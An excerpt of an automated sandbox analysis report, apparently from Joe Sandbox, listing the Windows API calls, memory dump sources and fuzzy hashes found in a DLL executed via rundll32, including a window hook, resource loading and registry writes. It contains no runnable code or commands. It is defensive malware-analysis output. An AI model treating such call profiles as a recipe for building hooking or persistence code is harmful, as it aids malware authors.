                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessagePeek$H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3998274959-0
                                                                                                                          • Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                          • Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
                                                                                                                          • Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
                                                                                                                          • Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 100160AF
                                                                                                                            • Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
                                                                                                                            • Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2
                                                                                                                          • SetEvent.KERNEL32(?,00000060), ref: 1001615C
                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 1001616C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1532457625-0
                                                                                                                          • Opcode ID: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                          • Instruction ID: 49adf720413ee406403ea303cbd260c8a37cc91a4464af3b062c384fe739287e
                                                                                                                          • Opcode Fuzzy Hash: aba3a14f37cb35c8a4256fe786ec03d8f5582434084a49b38ed0d3b5c255888d
                                                                                                                          • Instruction Fuzzy Hash: 9B312A38A00646EFCB14EFA4CE9595DBBB0FF08311B15466CE5569F2A2DB30FA81CB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • CharNextA.USER32(?), ref: 10022C6D
                                                                                                                            • Part of subcall function 10033A93: __ismbcspace_l.LIBCMT ref: 10033A99
                                                                                                                          • CharNextA.USER32(00000000), ref: 10022C8A
                                                                                                                          • _strtol.LIBCMT ref: 10022CB5
                                                                                                                          • _strtoul.LIBCMT ref: 10022CBC
                                                                                                                            • Part of subcall function 100338D4: strtoxl.LIBCMT ref: 100338F4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CharNext$__ismbcspace_l_strtol_strtoulstrtoxl
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4211061542-0
                                                                                                                          • Opcode ID: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                          • Instruction ID: 5151050668a075cb653ef24e642dff21439099837a3a94c33d4a4bfb9d6c905b
                                                                                                                          • Opcode Fuzzy Hash: c0131c4ce0529d7fd5e33596a62ab6746ae30cca9c8134ef8296b597ce6c539f
                                                                                                                          • Instruction Fuzzy Hash: 352127755002556FDB21DFB49C81BAEB7F8DF48241FA14066F984D7240DB709D40CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ArrayDestroyFreeSafeTask
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3253174383-0
                                                                                                                          • Opcode ID: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                          • Instruction ID: 529fdc980b661751dfd2f1e67b0f163afa7902daf74f578c55dc250feead27ea
                                                                                                                          • Opcode Fuzzy Hash: 3972c6b8702509201bc2289ccb81f4c02271859ab5e073d977715a4d6fe1d911
                                                                                                                          • Instruction Fuzzy Hash: 71117930201206EBDF66DF65EC88B6A7BE8FF05796B914458FC99CB250DB31ED01CA64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$EqualH_prolog3Intersect
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2161412305-0
                                                                                                                          • Opcode ID: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                          • Instruction ID: ff5c973b4bb1c2d03ca17daa0168de659ad61ff9b2eaf64daf92020a6b0172b0
                                                                                                                          • Opcode Fuzzy Hash: f39b3bfbb9b8fe3bd79ee9f08207123a737bade4225fe621e8dcddae7340d759
                                                                                                                          • Instruction Fuzzy Hash: D621367590024AEFCB01DFA4DD849EEBBB8FF08240F50856AF915A7111DB34AA05DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001FCF4
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 1001FD2A
                                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004F158,00000004,10013BBC,8007000E), ref: 1001FD53
                                                                                                                            • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 1001FD7C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1615547351-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 100170A7
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 100170AF
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 100170C1
                                                                                                                          • FreeResource.KERNEL32(00000000), ref: 1001710B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1001512A
                                                                                                                            • Part of subcall function 10015D26: __EH_prolog3.LIBCMT ref: 10015D2D
                                                                                                                          • __strdup.LIBCMT ref: 1001514C
                                                                                                                          • GetCurrentThread.KERNEL32(00000004,10001031,00000000), ref: 10015179
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 10015182
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4206445780-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10017742
                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1001774B
                                                                                                                          • _swprintf.LIBCMT ref: 10017768
                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 10017779
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4210924919-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 10017C70
                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 10017C7C
                                                                                                                          • LockResource.KERNEL32(00000000), ref: 10017C8A
                                                                                                                          • FreeResource.KERNEL32(00000000), ref: 10017CB8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$EmptyEqualIntersectInvalidate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3354205298-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 10021648
                                                                                                                          • GetCurrentProcess.KERNEL32(?,00000000), ref: 1002164E
                                                                                                                          • DuplicateHandle.KERNEL32 ref: 10021651
                                                                                                                          • GetLastError.KERNEL32(?), ref: 1002166C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3704204646-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • EnableMenuItem.USER32 ref: 100155F0
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetFocus.USER32 ref: 10015607
                                                                                                                          • GetParent.USER32(?), ref: 10015615
                                                                                                                          • SendMessageA.USER32 ref: 10015628
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: EnableException@8FocusItemMenuMessageParentSendThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4211600527-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B97C
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B9BB
                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 1001B9D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2353593579-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetDlgItem.USER32(?,?), ref: 1001B338
                                                                                                                          • GetTopWindow.USER32(00000000), ref: 1001B34B
                                                                                                                            • Part of subcall function 1001B32D: GetWindow.USER32(00000000,00000002), ref: 1001B392
                                                                                                                          • GetTopWindow.USER32(?), ref: 1001B37B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Item
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 369458955-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3016257755-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SysStringLen.OLEAUT32(?), ref: 1002BC45
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC5D
                                                                                                                          • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1002BC65
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1002D018,00000000,00000018,1002D35E), ref: 1002BC84
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3384502665-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100352EC: __getptd_noexit.LIBCMT ref: 100352ED
                                                                                                                            • Part of subcall function 100352EC: __amsg_exit.LIBCMT ref: 100352FA
                                                                                                                          • __amsg_exit.LIBCMT ref: 1003A571
                                                                                                                          • __lock.LIBCMT ref: 1003A581
                                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 1003A59E
                                                                                                                          • InterlockedIncrement.KERNEL32(02211520), ref: 1003A5C9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2880340415-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • FindResourceA.KERNEL32 ref: 1001DCA7
                                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCB3
                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCC0
                                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1001703A,?,?,100128C0,0986EB69), ref: 1001DCDB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1078018258-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

